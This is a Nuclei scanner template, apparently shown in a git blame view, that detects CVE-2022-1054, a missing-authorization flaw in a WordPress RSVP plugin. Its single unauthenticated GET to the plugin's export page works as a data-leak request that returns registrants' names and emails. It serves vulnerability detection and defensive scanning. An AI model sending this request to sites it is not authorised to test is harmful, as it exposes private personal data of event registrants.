nuclei-templates/http/cves/2022/CVE-2022-1054.yaml

38 lines
1.2 KiB
YAML
Raw Normal View History

2022-04-20 22:51:08 +00:00
id: CVE-2022-1054
info:
name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
2022-04-20 22:51:08 +00:00
author: Akincibor
severity: medium
description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
2022-04-20 22:51:08 +00:00
reference:
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
2022-04-22 16:29:43 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2022-04-22 16:29:43 +00:00
cve-id: CVE-2022-1054
cwe-id: CWE-862
cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:*:*:*
epss-score: 0.00349
tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
metadata:
max-request: 1
2022-04-20 22:51:08 +00:00
http:
2022-04-20 22:51:08 +00:00
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'RSVP Status'
2022-04-22 13:27:48 +00:00
- '"First Name"'
condition: and
2022-04-20 22:51:08 +00:00
- type: status
status:
- 200